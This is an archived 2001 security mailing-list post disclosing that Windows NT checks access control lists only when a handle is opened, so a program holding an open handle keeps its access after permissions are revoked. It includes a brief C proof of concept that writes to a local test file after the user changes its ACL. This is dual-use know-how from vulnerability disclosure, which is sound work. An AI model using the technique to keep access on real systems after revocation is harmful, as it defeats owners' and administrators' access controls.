Windows NT does not check permissions after HANDLEs are open

• Previous message: Antonomasia: "solaris gdb screen mayhem"
• Next in thread: Blue Boar: "Re: Windows NT does not check permissions after HANDLEs are open"
• Reply: Blue Boar: "Re: Windows NT does not check permissions after HANDLEs are open"
• Reply: Syzop: "Re: Windows NT does not check permissions after HANDLEs are open"
• Reply: Thorat_private: "Re: Windows NT does not check permissions after HANDLEs are open"
• Reply: Michael Wojcik: "RE: Windows NT does not check permissions after HANDLEs are open"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----


   Sorry for the cross-post; I thought this would be relevent to both communities.

   The component of the NT executive responsible for enforcing ACLs and DACLs is know as the Security Reference Monitor. When a kernel resource is requested, the requested program specifies the type of access it desires. The SRM checks against the access list, and grants the requestor a HANDLE to the object if requestor has appropriate rights.
    The check against the ACL only occurs when the HANDLE is first opened, however. If a HANDLE is opened and permissions on the objecect subsiquently change, the original requestor of the object retains the original access-permissions. Therefore, if is possible to retain access to an object after the Create/Owner or an administrator has changed the ACL simply by maintaining an open handle. If the requestor is a service or server-program that is expected to run 24/7 the object will remain accessible long after the ACL has been altered [thing ISAPI,extended stored procedures, et al].


  -- c0ncept

  O/T: I own a honda, and have been told by every mechanic that has looked at it that it is the easiest car to break into [ the AAA guy was nice enough to demonstrate]. I hear newer Hondas are even easier.

proof of concept:
  1.) create a file named "test.txt". Make it writeable to the curretn user
  2.) compile and run the included C code
  3.) when the program prompts you to change the ACL, uncheck
      Allow Inheritable Permissions to Propagate and remove all
      entries from the ACE. Press <return> at the prompt.
  4.) Take ownership of the file and open it. Notice that although the
      ACL had already been modified, the write succeeded.

[-- cut code here --]
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#define FILE_NAME	"test.txt"
#define MESSAGE		"Test"
#define MSG_LEN		4

int main(int argc, char** argv)
{
	HANDLE fileHandle;
	DWORD written;

	fileHandle = CreateFile(FILE_NAME,GENERIC_WRITE,
		FILE_SHARE_READ | FILE_SHARE_WRITE, NULL,
		OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,NULL);
	if(fileHandle == INVALID_HANDLE_VALUE){
		perror("Invalid Handle Value.\n");
		exit(1);
	}
	printf("Change the file's ACLs and press enter.");
	getchar();
	WriteFile(fileHandle,MESSAGE,MSG_LEN,&written,NULL);
	CloseHandle(fileHandle);

	return 0;
}
-----BEGIN PGP SIGNATURE-----
Version: Hush 2.0

wlwEARECABwFAjuNdeQVHGMwbmNlcHRAaHVzaG1haWwuY29tAAoJEPQWHaIUc7jETigA
n3E8BIlimuBni27rFfMuDV5FslDTAKCWoLPNCVWbYkFZOqoQB0JfHHfRWw==
=gsEn
-----END PGP SIGNATURE-----

• Next message: Wyatt, Anthony (ITS, Limestone Av): "RE: Outlook makes 99% CPU Usage with this message"
• Previous message: Antonomasia: "solaris gdb screen mayhem"
• Next in thread: Blue Boar: "Re: Windows NT does not check permissions after HANDLEs are open"
• Reply: Blue Boar: "Re: Windows NT does not check permissions after HANDLEs are open"
• Reply: Syzop: "Re: Windows NT does not check permissions after HANDLEs are open"
• Reply: Thorat_private: "Re: Windows NT does not check permissions after HANDLEs are open"
• Reply: Michael Wojcik: "RE: Windows NT does not check permissions after HANDLEs are open"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Aug 29 2001 - 22:08:20 PDT